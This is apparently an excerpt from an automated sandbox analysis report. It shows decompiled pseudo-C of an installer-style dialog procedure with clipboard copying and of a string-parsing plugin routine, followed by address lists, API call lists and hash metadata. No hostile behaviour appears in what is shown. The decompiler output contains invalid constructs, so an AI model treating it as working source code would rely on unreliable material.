				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t157 = _a8;
				_t150 = 0;
				_v8 =  *0x44e404;
				if(_t157 != 0x110) {
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E0040544A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						CloseHandle(_t121);
					}
					if(_t157 != 0x111) {
						L17:
						if(_t157 != 0x404) {
							L25:
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062EA(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							if(TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150) == 1) {
								_t165 = 1;
								_v56 = _t150;
								_v44 = 0x43c090;
								_v40 = 0x8000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t165 = _t165 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x44e3ec == _t150) {
							ShowWindow( *0x452428, 8);
							if( *0x4524ac == _t150) {
								_t113 =  *0x438068; // 0x720a3c
								E00405378( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E004042AD(1);
							goto L25;
						}
						 *0x436060 = 2;
						E004042AD(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040433B(_t157, _a12, _a16);
						}
						ShowWindow( *0x44e3f0, _t150);
						ShowWindow(_v8, 8);
						E00404309(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x452430;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x44e3f0 = GetDlgItem(_a4, 0x403);
				 *0x44e3e8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x44e404 = _t128;
				_v8 = _t128;
				E00404309( *0x44e3f0);
				 *0x44e3f4 = E00404BFA(4);
				 *0x44e40c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D4(_a4);
				if(( *0x452438 & 0x00000003) != 0) {
					ShowWindow( *0x44e3f0, _t150); // executed
					if(( *0x452438 & 0x00000002) != 0) {
						 *0x44e3f0 = _t150;
					} else {
						ShowWindow(_v8, 8); // executed
					}
					E00404309( *0x44e3e8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x452438 & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}


































                                                            0x004054c4
                                                            0x004054c7
                                                            0x004054cf
                                                            0x004054d2
                                                            0x00405667
                                                            0x00405684
                                                            0x0040568b
                                                            0x0040568b
                                                            0x0040569d
                                                            0x004056bf
                                                            0x004056c5
                                                            0x0040571a
                                                            0x0040571d
                                                            0x00000000
                                                            0x00000000
                                                            0x0040571f
                                                            0x00405725
                                                            0x00000000
                                                            0x00000000
                                                            0x0040572f
                                                            0x00405737
                                                            0x0040573a
                                                            0x00405837
                                                            0x00000000
                                                            0x00405837
                                                            0x00405749
                                                            0x00405755
                                                            0x0040575e
                                                            0x00405769
                                                            0x0040576c
                                                            0x00405775
                                                            0x0040577b
                                                            0x0040577e
                                                            0x0040577e
                                                            0x00405797
                                                            0x004057a2
                                                            0x004057a3
                                                            0x004057a6
                                                            0x004057ad
                                                            0x004057b4
                                                            0x004057bc
                                                            0x004057bc
                                                            0x004057d3
                                                            0x004057d3
                                                            0x004057da
                                                            0x004057e0
                                                            0x004057e9
                                                            0x004057f0
                                                            0x004057f9
                                                            0x004057fb
                                                            0x004057fe
                                                            0x0040580d
                                                            0x0040580f
                                                            0x00405812
                                                            0x00405813
                                                            0x00405816
                                                            0x00405817
                                                            0x00405818
                                                            0x00405820
                                                            0x0040582b
                                                            0x00405831
                                                            0x00405831
                                                            0x00000000
                                                            0x00405797
                                                            0x004056cd
                                                            0x004056fb
                                                            0x00405703
                                                            0x00405705
                                                            0x0040570e
                                                            0x0040570e
                                                            0x00405715
                                                            0x00000000
                                                            0x00405715
                                                            0x004056d1
                                                            0x004056db
                                                            0x00000000
                                                            0x0040569f
                                                            0x004056a5
                                                            0x004056e0
                                                            0x00000000
                                                            0x004056e7
                                                            0x004056ae
                                                            0x004056b5
                                                            0x004056ba
                                                            0x00000000
                                                            0x004056ba
                                                            0x0040569d
                                                            0x004054d8
                                                            0x004054dc
                                                            0x004054e4
                                                            0x004054e8
                                                            0x004054eb
                                                            0x004054ee
                                                            0x004054f1
                                                            0x004054f4
                                                            0x004054f5
                                                            0x004054f6
                                                            0x0040550f
                                                            0x00405512
                                                            0x0040551c
                                                            0x0040552b
                                                            0x00405533
                                                            0x0040553b
                                                            0x00405540
                                                            0x00405543
                                                            0x0040554f
                                                            0x00405558
                                                            0x00405561
                                                            0x00405583
                                                            0x00405589
                                                            0x0040559a
                                                            0x0040559f
                                                            0x004055ad
                                                            0x004055bb
                                                            0x004055bb
                                                            0x004055c0
                                                            0x004055ce
                                                            0x004055ce
                                                            0x004055d3
                                                            0x004055d6
                                                            0x004055db
                                                            0x004055e7
                                                            0x004055f0
                                                            0x004055fd
                                                            0x0040560c
                                                            0x004055ff
                                                            0x00405604
                                                            0x00405604
                                                            0x00405618
                                                            0x00405618
                                                            0x0040562c
                                                            0x00405635
                                                            0x0040563e
                                                            0x0040564e
                                                            0x0040565a
                                                            0x0040565a
                                                            0x00000000

                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 00405515
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405524
                                                            • GetClientRect.USER32 ref: 00405561
                                                            • GetSystemMetrics.USER32 ref: 00405568
                                                            • SendMessageA.USER32 ref: 00405589
                                                            • SendMessageA.USER32 ref: 0040559A
                                                            • SendMessageA.USER32 ref: 004055AD
                                                            • SendMessageA.USER32 ref: 004055BB
                                                            • SendMessageA.USER32 ref: 004055CE
                                                            • ShowWindow.USER32(00000000,?), ref: 004055F0
                                                            • ShowWindow.USER32(?,00000008), ref: 00405604
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405625
                                                            • SendMessageA.USER32 ref: 00405635
                                                            • SendMessageA.USER32 ref: 0040564E
                                                            • SendMessageA.USER32 ref: 0040565A
                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405533
                                                              • Part of subcall function 00404309: SendMessageA.USER32 ref: 00404317
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405676
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000544A,00000000), ref: 00405684
                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040568B
                                                            • ShowWindow.USER32(00000000), ref: 004056AE
                                                            • ShowWindow.USER32(?,00000008), ref: 004056B5
                                                            • ShowWindow.USER32(00000008), ref: 004056FB
                                                            • SendMessageA.USER32 ref: 0040572F
                                                            • CreatePopupMenu.USER32 ref: 00405740
                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405755
                                                            • GetWindowRect.USER32(?,000000FF), ref: 00405775
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578E
                                                            • SendMessageA.USER32 ref: 004057CA
                                                            • OpenClipboard.USER32(00000000), ref: 004057DA
                                                            • EmptyClipboard.USER32 ref: 004057E0
                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E9
                                                            • GlobalLock.KERNEL32 ref: 004057F3
                                                            • SendMessageA.USER32 ref: 00405807
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405820
                                                            • SetClipboardData.USER32 ref: 0040582B
                                                            • CloseClipboard.USER32 ref: 00405831
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: <r
                                                            • API String ID: 590372296-2530491772
                                                            • Opcode ID: 1100f4880005faef561a40811008994f6c97a2979eea71fdeb132e64cd9f5767
                                                            • Instruction ID: a29ac8d60da1fb34f4aa2469bcdf397c87ff466403413f05bd0ae09002c56f5c
                                                            • Opcode Fuzzy Hash: 1100f4880005faef561a40811008994f6c97a2979eea71fdeb132e64cd9f5767
                                                            • Instruction Fuzzy Hash: 7BA16BB1900608BFEB119F64DE89EAE7B79FB08354F00403AFA45B61A1CB754E51DF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C22288 Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 667stringlibrarymemoryCOMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E73C22288() {
				CHAR* _t236;
				void* _t238;
				signed int _t239;
				char _t240;
				char _t241;
				void _t242;
				CHAR* _t243;
				void* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				int _t252;
				CHAR* _t253;
				signed short _t255;
				CHAR* _t259;
				void* _t260;
				CHAR** _t261;
				intOrPtr _t264;
				void* _t272;
				signed int _t273;
				CHAR* _t274;
				CHAR* _t276;
				CHAR* _t279;
				void* _t281;
				CHAR* _t282;
				void _t283;
				signed int _t287;
				void* _t288;
				void* _t291;
				CHAR* _t298;
				signed int _t299;
				CHAR* _t303;
				CHAR* _t305;
				CHAR* _t306;
				CHAR* _t307;
				CHAR* _t312;
				CHAR* _t313;
				char _t319;
				CHAR* _t320;
				char _t323;
				signed int _t333;
				void* _t335;
				CHAR* _t336;
				CHAR* _t337;
				void _t338;
				CHAR* _t341;
				CHAR* _t343;
				signed int _t345;
				signed int _t346;
				void* _t347;
				void* _t348;
				void* _t349;
				signed int _t355;
				CHAR* _t360;
				void* _t361;
				signed int _t368;
				signed int _t369;
				CHAR* _t370;
				void* _t371;
				CHAR* _t377;
				signed int _t379;
				CHAR* _t380;
				void* _t382;
				void* _t383;
				CHAR* _t384;
				CHAR* _t385;
				CHAR* _t386;
				CHAR* _t387;
				struct HINSTANCE__* _t388;
				CHAR* _t390;
				void* _t391;
				void* _t392;

				 *(_t392 + 0x1c) = 0;
				_t382 = 0;
				 *(_t392 + 0x34) = 0;
				 *(_t392 + 0x30) = 0;
				 *(_t392 + 0x18) = 0;
				 *(_t392 + 0x2c) = 0;
				 *(_t392 + 0x3c) = 0;
				 *(_t392 + 0x28) = 0;
				_t236 = E73C212C6();
				 *(_t392 + 0x14) = _t236;
				_t312 = _t236;
				 *(_t392 + 0x38) = E73C212C6();
				_t238 = E73C2152B();
				_t391 = _t238;
				 *(_t392 + 0x44) = _t238;
				_t383 = _t238;
				 *(_t392 + 0x24) = _t391;
				 *((intOrPtr*)(_t392 + 0x48)) = 2;
				_t239 = 0;
				while(1) {
					_t368 = _t239;
					 *(_t392 + 0x40) = _t368;
					if(_t239 != 0 && _t382 == 0) {
						break;
					}
					_t240 =  *_t391;
					 *((char*)(_t392 + 0x13)) = _t240;
					_t241 = _t240;
					_t319 = _t241;
					if(_t319 == 0) {
						_t169 = _t392 + 0x1c;
						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
						__eflags =  *_t169;
						L132:
						_t369 = _t368;
						if(_t369 == 0) {
							_t370 = 0;
							 *_t312 = 0;
							__eflags = _t382;
							if(_t382 == 0) {
								_t281 = GlobalAlloc(0x40, 0x14a4); // executed
								_t382 = _t281;
								_t370 = 0;
								__eflags = 0;
								 *(_t382 + 0x810) = 0;
								 *(_t382 + 0x814) = 0;
							}
							_t242 =  *(_t392 + 0x34);
							_t177 = _t382 + 8; // 0x8
							_t320 = _t177;
							_t178 = _t382 + 0x408; // 0x408
							_t384 = _t178;
							 *_t382 = _t242;
							 *_t320 = _t370;
							 *_t384 = _t370;
							 *(_t382 + 0x808) = _t370;
							 *(_t382 + 0x80c) = _t370;
							 *(_t382 + 4) = _t370;
							_t243 = _t242 - _t370;
							__eflags = _t243;
							if(_t243 == 0) {
								__eflags = _t312 -  *(_t392 + 0x14);
								if(_t312 ==  *(_t392 + 0x14)) {
									goto L154;
								}
								_t390 = _t370;
								GlobalFree(_t382);
								_push( *(_t392 + 0x14));
								_t382 = E73C21326();
								__eflags = _t382;
								if(_t382 == 0) {
									goto L154;
								} else {
									goto L147;
								}
								while(1) {
									L147:
									_t272 =  *(_t382 + 0x14a0);
									__eflags = _t272;
									if(_t272 == 0) {
										break;
									}
									_t390 = _t382;
									_t382 = _t272;
								}
								__eflags = _t390;
								if(_t390 != 0) {
									_t187 =  &(_t390[0x14a0]);
									 *_t187 = _t390[0x14a0] & 0x00000000;
									__eflags =  *_t187;
								}
								_t273 =  *(_t382 + 0x810);
								__eflags = _t273 & 0x00000008;
								if((_t273 & 0x00000008) == 0) {
									_t333 = 2;
									_t274 = _t273 | _t333;
									__eflags = _t274;
									 *(_t382 + 0x810) = _t274;
								} else {
									_t382 = E73C212D5(_t382);
									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
								}
								goto L154;
							} else {
								_t276 = _t243 - 1;
								__eflags = _t276;
								if(_t276 == 0) {
									L143:
									lstrcpyA(_t320,  *(_t392 + 0x38));
									L144:
									lstrcpyA(_t384,  *(_t392 + 0x14));
									L154:
									_t312 =  *(_t392 + 0x14);
									L155:
									_t239 =  *(_t392 + 0x1c);
									_t391 = _t391 + 1;
									 *(_t392 + 0x24) = _t391;
									_t383 = _t391;
									if(_t239 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t279 = _t276 - 1;
								__eflags = _t279;
								if(_t279 == 0) {
									goto L144;
								}
								__eflags = _t279 != 1;
								if(_t279 != 1) {
									goto L154;
								}
								goto L143;
							}
						}
						_t371 = _t369 - 1;
						if(_t371 == 0) {
							_t282 =  *(_t392 + 0x30);
							if( *(_t392 + 0x2c) == _t371) {
								_t282 = _t282 - 1;
							}
							 *(_t382 + 0x814) = _t282;
						}
						goto L154;
					}
					_t335 = _t319 - 0x23;
					if(_t335 == 0) {
						_t336 =  *(_t392 + 0x1c);
						__eflags = _t383 -  *(_t392 + 0x44);
						if(_t383 <=  *(_t392 + 0x44)) {
							L29:
							__eflags =  *(_t392 + 0x28);
							if( *(_t392 + 0x28) != 0) {
								L15:
								_t337 = _t336;
								__eflags = _t337;
								if(_t337 == 0) {
									_t283 =  *((intOrPtr*)(_t392 + 0x13));
									while(1) {
										__eflags = _t283 - 0x22;
										if(_t283 != 0x22) {
											break;
										}
										_t391 = _t391 + 1;
										__eflags =  *(_t392 + 0x28);
										_t383 = _t391;
										if( *(_t392 + 0x28) == 0) {
											__eflags = 1;
											 *(_t392 + 0x28) = 1;
											L121:
											 *_t312 =  *_t391;
											_t312 =  &(_t312[1]);
											goto L155;
										}
										_t157 = _t392 + 0x28;
										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
										__eflags =  *_t157;
										_t283 =  *_t391;
									}
									__eflags = _t283 - 0x2a;
									if(_t283 == 0x2a) {
										_t287 = 2;
										 *(_t392 + 0x34) = _t287;
										L129:
										_t385 =  *(_t392 + 0x14);
										L130:
										_t312 = _t385;
										goto L155;
									}
									__eflags = _t283 - 0x2d;
									if(_t283 == 0x2d) {
										L117:
										_t338 =  *_t391;
										__eflags = _t338 - 0x2d;
										if(_t338 != 0x2d) {
											L122:
											_t162 = _t391 + 1; // 0x1
											_t288 = _t162;
											__eflags =  *_t288 - 0x3a;
											if( *_t288 != 0x3a) {
												goto L121;
											}
											__eflags = _t338 - 0x2d;
											if(_t338 == 0x2d) {
												goto L121;
											}
											__eflags = 1;
											 *(_t392 + 0x34) = 1;
											L125:
											_t385 =  *(_t392 + 0x14);
											_t391 = _t288;
											__eflags = _t312 - _t385;
											if(_t312 <= _t385) {
												 *( *(_t392 + 0x38)) = 0;
											} else {
												 *_t312 = 0;
												lstrcpyA( *(_t392 + 0x3c), _t385);
											}
											goto L130;
										}
										_t159 = _t383 + 1; // 0x1
										_t288 = _t159;
										__eflags =  *_t288 - 0x3e;
										if( *_t288 != 0x3e) {
											goto L122;
										}
										 *(_t392 + 0x34) = 3;
										goto L125;
									}
									__eflags = _t283 - 0x3a;
									if(_t283 != 0x3a) {
										goto L121;
									}
									goto L117;
								}
								_t341 = _t337 - 1;
								__eflags = _t341;
								if(_t341 == 0) {
									_t313 =  *(_t392 + 0x30);
									L49:
									_t291 = _t241 + 0xffffffde;
									__eflags = _t291 - 0x55;
									if(_t291 > 0x55) {
										goto L129;
									}
									_t76 = _t291 + 0x73c22b1c; // 0x73c2402c
									switch( *((intOrPtr*)(( *_t76 & 0x000000ff) * 4 +  &M73C22A94))) {
										case 0:
											__esi =  *(__esp + 0x14);
											__ecx =  *(__esp + 0x14);
											__dl =  *((intOrPtr*)(__esp + 0x13));
											while(1) {
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												L86:
												__eflags =  *(__ebp + 1) - __dl;
												if( *(__ebp + 1) != __dl) {
													L91:
													 *__ecx = 0;
													__esi = E73C212AF(__esi);
													goto L92;
												}
												L87:
												__eflags = __al;
												if(__al == 0) {
													goto L91;
												}
												__eflags = __al - __dl;
												if(__al == __dl) {
													__ebp = __ebp + 1;
													__eflags = __ebp;
												}
												__al =  *__ebp;
												 *__ecx =  *__ebp;
												__ecx = __ecx + 1;
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												goto L86;
											}
										case 1:
											L46:
											 *(_t392 + 0x18) = 1;
											goto L129;
										case 2:
											 *(__esp + 0x18) =  *(__esp + 0x18) | 0xffffffff;
											goto L129;
										case 3:
											 *(__esp + 0x18) =  *(__esp + 0x18) & 0;
											__eax = 0;
											 *(__esp + 0x20) =  *(__esp + 0x20) & 0;
											__ebx = __ebx + 1;
											__eax = 1;
											 *(__esp + 0x30) = __ebx;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											goto L129;
										case 4:
											__eflags =  *(__esp + 0x20);
											if( *(__esp + 0x20) != 0) {
												goto L129;
											}
											 *(__esp + 0x24) = __ebp;
											__esi = E73C212C6();
											__eax = __esp + 0x24;
											_push(__esi);
											__eax = E73C21B4C(__eax);
											_push(__edx);
											_push(__eax);
											__eax = E73C2144D(__ecx);
											__esp = __esp + 0xc;
											goto L80;
										case 5:
											 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
											goto L129;
										case 6:
											_push(7);
											goto L74;
										case 7:
											_push(0x19);
											goto L101;
										case 8:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L58;
										case 9:
											_push(0x15);
											goto L101;
										case 0xa:
											_push(0x16);
											goto L101;
										case 0xb:
											_push(0x18);
											goto L101;
										case 0xc:
											__eax = 0;
											__eflags = 0;
											_t103 = __eax + 1; // 0x1
											__edx = _t103;
											goto L69;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L61;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L75;
										case 0xf:
											__eax = 0;
											__eflags = 0;
											_t105 = __eax + 1; // 0x1
											__edx = _t105;
											goto L73;
										case 0x10:
											__eax = 0;
											__eflags = 0;
											_t100 = __eax + 1; // 0x1
											__edx = _t100;
											goto L65;
										case 0x11:
											_push(3);
											goto L74;
										case 0x12:
											_push(0x17);
											L101:
											_pop(__esi);
											goto L102;
										case 0x13:
											__eax = __esp + 0x24;
											__eax = E73C21B4C(__esp + 0x24);
											_push(0xb);
											_pop(__esi);
											_t134 = __eax + 1; // 0x1
											__ecx = _t134;
											__eflags = _t134 - __esi;
											_push(1);
											_pop(__ecx);
											__esi =  >=  ? _t134 : __esi;
											__esi = __eax + __esi;
											__eflags = __esi;
											L80:
											__ebp =  *(__esp + 0x24);
											goto L93;
										case 0x14:
											__esi = __esi | 0xffffffff;
											goto L102;
										case 0x15:
											 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 1;
											_push(3);
											goto L74;
										case 0x16:
											__eax = 0;
											goto L75;
										case 0x17:
											__eax = 0;
											__eflags = 0;
											_t104 = __eax + 1; // 0x1
											__edx = _t104;
											goto L71;
										case 0x18:
											_t342 =  *(_t382 + 0x814);
											__eflags = _t342 - _t313;
											_push(1);
											_t294 =  <=  ? _t313 : _t342;
											 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0;
											 *(_t392 + 0x24) =  *(_t392 + 0x24) & 0;
											_t314 =  <=  ? _t313 : _t342;
											__eflags =  *(_t392 + 0x38) - 3;
											 *(_t392 + 0x34) =  <=  ? _t313 : _t342;
											__eflags = _t342 - (0 |  *(_t392 + 0x38) == 0x00000003);
											_pop(_t297);
											_t374 =  !=  ? _t297 :  *(_t392 + 0x30);
											 *(_t392 + 0x2c) =  !=  ? _t297 :  *(_t392 + 0x30);
											goto L129;
										case 0x19:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L58:
											_push(2);
											_pop(__ecx);
											 *(__esp + 0x18) = __ecx;
											goto L75;
										case 0x1a:
											L69:
											_push(5);
											goto L74;
										case 0x1b:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L61:
											_push(3);
											_pop(__esi);
											 *(__esp + 0x18) = __esi;
											goto L75;
										case 0x1c:
											__eax = 0;
											__eax = 1;
											goto L75;
										case 0x1d:
											L73:
											_push(6);
											goto L74;
										case 0x1e:
											L65:
											_push(2);
											goto L74;
										case 0x1f:
											__eax = __esp + 0x24;
											__eax = E73C21B4C(__esp + 0x24);
											__ebp =  *(__esp + 0x28);
											_t138 = __eax + 1; // 0x1
											__esi = _t138;
											L92:
											_pop(__ecx);
											L93:
											__eflags = __esi;
											if(__esi == 0) {
												goto L129;
											}
											L102:
											__ecx =  *(__esp + 0x20);
											0 = 1;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 1;
												if(__ecx == 1) {
													__eax = __ebx;
													__eax = __ebx << 5;
													__eflags = __eax;
													 *(__eax + __edi + 0x82c) = __esi;
												}
												L109:
												 *(__esp + 0x20) = __ecx;
												goto L129;
											}
											__ebx = __ebx << 5;
											__eax =  *(__ebx + __edi + 0x830);
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L105:
												__eax = GlobalFree(__eax);
												__ecx =  *(__esp + 0x20);
												L106:
												 *(__ebx + __edi + 0x830) = __esi;
												goto L109;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L106;
											}
											goto L105;
										case 0x20:
											L71:
											_push(4);
											L74:
											_pop(__eax);
											L75:
											__ecx =  *(0x73c24090 + __eax * 4);
											__esi = __ebx;
											__esi = __ebx << 5;
											__edx =  ~__edx;
											_push(1);
											asm("sbb edx, edx");
											 *(__esp + 0x30) = 1;
											__edx = __edx & 0x00008000;
											__edx = __edx | __eax;
											0 = 1;
											 *(__esi + __edi + 0x818) = __edx;
											__edx =  *(__esp + 0x1c);
											__eflags = __ecx;
											__eax =  >  ? __ecx : 1;
											__eflags = __edx;
											_pop(__ecx);
											__eax =  <  ? __ecx :  >  ? __ecx : 1;
											 *((intOrPtr*)(__esi + __edi + 0x828)) =  <  ? __ecx :  >  ? __ecx : 1;
											__eflags = __edx - __ecx;
											if(__edx == __ecx) {
												__eax = __esp + 0x24;
												__eax = E73C21B4C(__esp + 0x24);
												__ebp =  *(__esp + 0x28);
												_t116 = __eax + 1; // 0x1
												__edx = _t116;
												 *(__esp + 0x18) = __edx;
											}
											 *(__esi + __edi + 0x830) =  *(__esi + __edi + 0x830) & 0x00000000;
											__ecx = __ebx + 0x41;
											__ecx = __ebx + 0x41 << 5;
											 *(__esi + __edi + 0x81c) = __edx;
											 *((__ebx + 0x41 << 5) + __edi) =  *((__ebx + 0x41 << 5) + __edi) & 0x00000000;
											 *(__esi + __edi + 0x82c) =  *(__esi + __edi + 0x82c) & 0x00000000;
											goto L129;
										case 0x21:
											goto L129;
									}
								}
								_t343 = _t341 - 1;
								__eflags = _t343;
								if(_t343 == 0) {
									_t313 = 0;
									 *(_t392 + 0x30) = 0;
									goto L49;
								}
								__eflags = _t343 != 1;
								if(_t343 != 1) {
									goto L121;
								}
								__eflags = _t241 - 0x6e;
								if(__eflags > 0) {
									_t298 = _t241 - 0x72;
									__eflags = _t298;
									if(_t298 == 0) {
										_push(4);
										L41:
										_pop(_t299);
										L42:
										_t345 =  *(_t382 + 0x810);
										__eflags =  *(_t392 + 0x18) - 1;
										if( *(_t392 + 0x18) != 1) {
											_t346 = _t345 &  !_t299;
											__eflags = _t346;
										} else {
											_t346 = _t345 | _t299;
										}
										 *(_t382 + 0x810) = _t346;
										goto L46;
									}
									_t303 = _t298 - 1;
									__eflags = _t303;
									if(_t303 == 0) {
										_push(0x10);
										goto L41;
									}
									_t347 = 2;
									__eflags = _t303 != _t347;
									if(_t303 != _t347) {
										goto L129;
									}
									_push(0x40);
									goto L41;
								}
								if(__eflags == 0) {
									_push(8);
									goto L41;
								}
								_t305 = _t241 - 0x21;
								__eflags = _t305;
								if(_t305 == 0) {
									 *(_t392 + 0x18) =  ~( *(_t392 + 0x18));
									goto L129;
								}
								_t306 = _t305 - 0x11;
								__eflags = _t306;
								if(_t306 == 0) {
									_t299 = 0x100;
									goto L42;
								}
								_t307 = _t306 - 0x31;
								__eflags = _t307;
								if(_t307 == 0) {
									_t299 = 1;
									goto L42;
								}
								_t348 = 2;
								__eflags = _t307 != _t348;
								if(_t307 != _t348) {
									goto L129;
								} else {
									_push(0x20);
									goto L41;
								}
							}
							 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0x00000000;
							 *(_t392 + 0x34) =  *(_t392 + 0x34) & 0x00000000;
							goto L132;
						}
						__eflags =  *((char*)(_t391 - 1)) - 0x3a;
						if( *((char*)(_t391 - 1)) != 0x3a) {
							goto L29;
						}
						__eflags = _t336;
						if(_t336 == 0) {
							goto L15;
						}
						goto L29;
					}
					_t349 = _t335 - 5;
					if(_t349 == 0) {
						__eflags =  *(_t392 + 0x28);
						if( *(_t392 + 0x28) == 0) {
							 *(_t392 + 0x1c) = 1;
							__eflags =  *(_t392 + 0x34) - 3;
